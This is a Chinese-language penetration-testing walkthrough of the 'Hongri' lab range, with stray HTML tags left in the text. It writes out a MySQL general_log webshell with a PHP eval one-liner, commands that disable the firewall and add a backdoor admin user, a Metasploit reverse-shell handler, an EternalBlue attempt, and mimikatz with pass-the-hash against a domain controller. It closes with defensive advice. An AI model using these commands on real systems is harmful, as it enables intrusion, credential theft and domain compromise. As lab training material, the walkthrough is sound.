红日靶场(一)渗透测试实战教学文档<\/h1>

一、靶场环境配置<\/h2>

1.1 网络拓扑结构<\/h3>

攻击机<\/strong>：Kali Linux (192.168.108.128)<\/li>

目标机1<\/strong>：Win7 (Web服务器，双网卡)

外网网卡：192.168.108.132 (VMnet8)<\/li>
内网网卡：192.168.52.143 (VMnet1)<\/li> <\/ul> <\/li>
目标机2<\/strong>：Windows 2008 (域控，192.168.52.138)<\/li>
目标机3<\/strong>：Win2k3 (域管，192.168.52.141)<\/li> <\/ul>
1.2 网络配置要点<\/h3>

确保Kali与Win7外网网卡在同一网段(VMnet8)<\/li>
Win7内网网卡与域内其他主机在同一网段(VMnet1)<\/li>
根据实际Kali网段调整Win7外网网卡IP<\/li> <\/ol>
二、Web渗透阶段<\/h2>
2.1 信息收集<\/h3>

端口扫描<\/strong>：<\/p>
nmap -sS -T4 192.168.108.132 <\/span><\/span><\/code><\/pre>发现开放端口：3306(MySQL), 135, 139, 445(SMB)<\/p> <\/li> 目录扫描<\/strong>：<\/p> 使用工具：dirsearch、御剑、dirb<\/li> 发现关键目录： \/phpmyadmin<\/li> 备份文件<\/li> \/yxcms (部分工具可能扫不到)<\/li> <\/ul> <\/li> <\/ul> <\/li> <\/ol> 2.2 通过phpMyAdmin获取WebShell<\/h3> 方法一：INTO OUTFILE导出木马<\/h4> 必要条件<\/strong>：<\/p> 知道网站绝对路径<\/li> secure_file_priv参数为空(默认为NULL)<\/li> 具有root权限<\/li> <\/ol> 方法二：MySQL日志文件Getshell（实战成功方法）<\/h4> 登录phpMyAdmin(admin\/admin)<\/li> 检查日志状态： SHOW<\/span> VARIABLES LIKE<\/span> '%general%'<\/span>; <\/span><\/span><\/code><\/pre><\/li> 开启日志并设置路径： SET<\/span> GLOBAL<\/span> general_log=<\/span>'on'<\/span>; <\/span><\/span>SET<\/span> GLOBAL<\/span> general_log_file=<\/span>'C:\/phpStudy\/www\/hack.php'<\/span>; <\/span><\/span><\/code><\/pre><\/li> 写入WebShell： SELECT<\/span> '<?php eval($_POST["cmd"]);?>'<\/span>; <\/span><\/span><\/code><\/pre><\/li> 使用哥斯拉连接WebShell： URL: http:\/\/192.168.108.132\/hack.php<\/li> 密码: cmd<\/li> <\/ul> <\/li> <\/ol> 三、内网渗透阶段<\/h2> 3.1 权限维持与横向移动准备<\/h3> 关闭防火墙<\/strong>：<\/p> netsh advfirewall set allprofiles state off <\/span><\/span><\/code><\/pre><\/li> 上线Cobalt Strike<\/strong>：<\/p> 启动CS服务端<\/li> 生成Windows可执行payload<\/li> 通过哥斯拉上传并执行payload<\/li> CS上线后优化： sleep 0 <\/span><\/span>shell systeminfo <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> 提权操作<\/strong>：<\/p> 查看补丁情况(发现仅4个补丁)<\/li> 使用svc-exe提权至SYSTEM权限<\/li> <\/ul> <\/li> <\/ol> 3.2 内网信息收集<\/h3> 域环境探测<\/strong>：<\/p> net config Workstation <\/span><\/span>net view \/domain <\/span><\/span><\/code><\/pre> 当前域：god<\/li> 域控主机：owa (192.168.52.138)<\/li> <\/ul> <\/li> 域内主机发现<\/strong>：<\/p> net group "domain controllers"<\/span> \/domain <\/span><\/span>net view <\/span><\/span><\/code><\/pre> 发现主机：192.168.52.141<\/li> <\/ul> <\/li> 开启RDP远程连接(可选)<\/strong>：<\/p> REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "<\/span>Server \/v fDenyTSConnections \/t REG_DWORD \/d 00000000 \/f <\/span><\/span>netsh advfirewall firewall add rule name="Open 3389"<\/span> dir=in action=allow protocol=TCP localport=3389 <\/span><\/span>netsh advfirewall set allprofiles state off <\/span><\/span>net user test Passwd123 \/add <\/span><\/span>net localgroup administrators test \/add <\/span><\/span><\/code><\/pre><\/li> <\/ol> 四、后渗透阶段<\/h2> 4.1 CS与MSF联动<\/h3> MSF设置监听<\/strong>：<\/p> use exploit\/multi\/handler <\/span><\/span>set payload windows\/meterpreter\/reverse_http <\/span><\/span>set lhost 192.168.236.128 <\/span><\/span>set lport 1111<\/span> <\/span><\/span>exploit <\/span><\/span><\/code><\/pre><\/li> CS派生会话<\/strong>：<\/p> 创建新监听器： Payload类型：foreign\/reverse_http<\/li> 名称：MSF<\/li> 端口与MSF监听端口一致<\/li> <\/ul> <\/li> 执行： spawn MSF <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> <\/ol> 4.2 横向移动技术<\/h3> 永恒之蓝利用(失败)<\/strong>：<\/p> use exploit\/windows\/smb\/ms17_010_eternalblue <\/span><\/span>set payload windows\/x64\/meterpreter\/bind_tcp <\/span><\/span>set rhosts 192.168.52.138 <\/span><\/span>run <\/span><\/span><\/code><\/pre><\/li> 哈希传递攻击(PTH)成功<\/strong>：<\/p> 使用CS的mimikatz抓取哈希与明文密码<\/li> 通过psexec横向移动：自动填充获取的凭据<\/li> 选择SMB监听器<\/li> 使用Web服务器会话作为跳板<\/li> <\/ul> <\/li> 最终成功获取域控权限<\/li> <\/ul> <\/li> <\/ol> 五、关键知识点总结<\/h2> Web渗透突破口<\/strong>：<\/p> 弱口令攻击(phpMyAdmin)<\/li> MySQL日志文件Getshell技术<\/li> <\/ul> <\/li> 内网渗透核心<\/strong>：<\/p> 权限维持(Cobalt Strike)<\/li> 信息收集(net命令系列)<\/li> 横向移动(PTH哈希传递)<\/li> <\/ul> <\/li> 防御建议<\/strong>：<\/p> MySQL安全配置(secure_file_priv)<\/li> 定期更改管理密码<\/li> 及时安装系统补丁<\/li> 限制SMB协议的使用<\/li> 监控异常日志文件修改<\/li> <\/ul> <\/li> <\/ol> 本教学文档完整还原了从外网渗透到内网横向移动的全过程，重点突出了在实际渗透测试中的关键技术点和操作流程。<\/p>